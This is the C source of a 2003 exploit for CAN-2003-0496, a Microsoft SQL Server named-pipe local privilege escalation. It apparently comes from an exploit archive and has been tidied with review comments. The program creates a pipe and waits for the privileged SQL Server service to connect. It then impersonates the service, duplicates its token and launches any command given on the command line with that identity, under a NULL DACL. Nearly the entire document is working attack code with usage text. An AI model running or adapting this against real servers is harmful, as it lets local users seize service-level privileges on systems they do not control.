




2003-07-15 Microsoft SQL Server Named Pipe Privilege Escalation Exploit
/*
 * Author: Maceo and wirepair
 * Modified to take advantage of CAN-2003-0496 (Named Pipe Filename
 * MSSQL Local Privilege Escalation, found by @stake). Use together with
 * their advisory: a privileged SQL Server client must be made to connect
 * to the pipe this program creates.
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>


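int main(int argc, char **argv)
{
    /*
     * Local privilege escalation helper for CAN-2003-0496: create a named
     * pipe, wait for a higher-privileged client (the SQL Server service, per
     * the @stake advisory) to connect, impersonate that client, turn the
     * impersonation token into a primary token and spawn argv[1] with it.
     *
     * argv[1] is the command line to run as the connecting client.
     * Returns 0 when the process was launched, non-zero on any failure;
     * the Win32 error code of the failing call is printed (GetLastError()
     * is now read right after the call that failed, not once at startup).
     */
    static const char szPipe[] = "\\\\.\\pipe\\poop";
    HANDLE hPipe = INVALID_HANDLE_VALUE;
    HANDLE hToken = NULL;   /* impersonation token of the pipe client */
    HANDLE hToken2 = NULL;  /* primary token duplicated from hToken */
    PSECURITY_DESCRIPTOR pSD = NULL;
    SECURITY_ATTRIBUTES sa;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    char szUser[256];
    DWORD dwSize = sizeof(szUser);
    int rc = 1;

    if (argc != 2) {
        fprintf(stderr,
                "Usage: %s <command>\n"
                "Named Pipe Local Priv Escalation found by @stake.\n"
                "This code is to be used with MS-SQL exactly as outlined in their advisory\n"
                "All credit for this code goes to Maceo, he did a fine job.. -wire\n"
                "Also thanks goes to brett Moore for helping me with DuplicateTokenEx, thanks buddy guy!\n",
                argv[0]);
        return 1;
    }

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));
    si.cb = sizeof(si);
    si.lpDesktop = NULL;

    /* The pipe itself keeps the default security descriptor (NULL here);
     * the NULL-DACL descriptor built below is only used for the token and
     * the new process. */
    hPipe = CreateNamedPipe(szPipe, PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Failed to create named pipe:\n %s\n", szPipe);
        printf("GetLastError: %lu\n", GetLastError());
        return 3;
    }
    printf("Created Named Pipe: %s\n", szPipe);

    /*
     * Security attributes for the duplicated token and the spawned process:
     * a NULL DACL, i.e. no protection at all on those objects (kept from the
     * original). NOTE(review): this lets any local user open the spawned
     * high-privilege process; pass NULL instead of &sa below to get the
     * default DACL if that matters in your environment.
     */
    pSD = (PSECURITY_DESCRIPTOR)LocalAlloc(LPTR, SECURITY_DESCRIPTOR_MIN_LENGTH);
    if (pSD == NULL ||
        !InitializeSecurityDescriptor(pSD, SECURITY_DESCRIPTOR_REVISION) ||
        !SetSecurityDescriptorDacl(pSD, TRUE, NULL, FALSE)) {
        printf("Failed to build security descriptor, GetLastError: %lu\n",
               GetLastError());
        rc = 4;
        goto cleanup;
    }
    sa.nLength = sizeof(sa);
    sa.lpSecurityDescriptor = pSD;
    sa.bInheritHandle = FALSE;

    printf("Waiting for connection...\n");
    /* A client that connected between CreateNamedPipe and this call is
     * reported as ERROR_PIPE_CONNECTED, which is success for our purposes. */
    if (!ConnectNamedPipe(hPipe, NULL) &&
        GetLastError() != ERROR_PIPE_CONNECTED) {
        printf("ConnectNamedPipe failed, GetLastError: %lu\n", GetLastError());
        rc = 4;
        goto cleanup;
    }

    /* Assume the identity of the client on this thread. */
    if (!ImpersonateNamedPipeClient(hPipe)) {
        printf("Failed to impersonate the named pipe.\n");
        printf("GetLastError: %lu\n", GetLastError());
        rc = 5;
        goto cleanup;
    }

    /* OpenAsSelf=TRUE: the access check on the thread token is done with our
     * own process token, not the client's. Only the rights DuplicateTokenEx
     * needs are requested (least privilege; the original asked for
     * TOKEN_ALL_ACCESS). A failure here used to fall through with an
     * uninitialised hToken. */
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_DUPLICATE | TOKEN_QUERY,
                         TRUE, &hToken)) {
        printf("OpenThreadToken failed, GetLastError: %lu\n", GetLastError());
        rc = 6;
        goto cleanup;
    }

    printf("Duplicating Token...\n");
    /* CreateProcessAsUser needs a primary token. This only succeeds when the
     * client allowed SecurityImpersonation or higher; an identification-level
     * token fails with ERROR_BAD_IMPERSONATION_LEVEL. */
    if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, &sa, SecurityImpersonation,
                          TokenPrimary, &hToken2)) {
        printf("error in duplicate token\n");
        printf("GetLastError: %lu\n", GetLastError());
        rc = 7;
        goto cleanup;
    }

    /* Show who we are impersonating (best effort, not fatal). */
    if (GetUserName(szUser, &dwSize)) {
        printf("Impersonating: %s\n", szUser);
    } else {
        printf("Impersonating: <unknown>, GetUserName GetLastError: %lu\n",
               GetLastError());
    }

    printf("Creating New Process %s\n", argv[1]);
    if (!CreateProcessAsUser(hToken2, NULL, argv[1], &sa, &sa, TRUE,
                             NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
                             NULL, NULL, &si, &pi)) {
        printf("CreateProcessAsUser failed, GetLastError: %lu\n",
               GetLastError());
        rc = 8;
        goto cleanup;
    }
    /* The child keeps running on its own; we do not need its handles. */
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    rc = 0;

cleanup:
    /* Drop the client's identity before returning and release every handle
     * on all paths (the original leaked the tokens and the descriptor). */
    RevertToSelf();
    if (hToken2 != NULL)
        CloseHandle(hToken2);
    if (hToken != NULL)
        CloseHandle(hToken);
    if (pSD != NULL)
        LocalFree(pSD);
    if (hPipe != INVALID_HANDLE_VALUE)
        CloseHandle(hPipe);
    return rc;
}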


securitydot.net - 2003-07-15


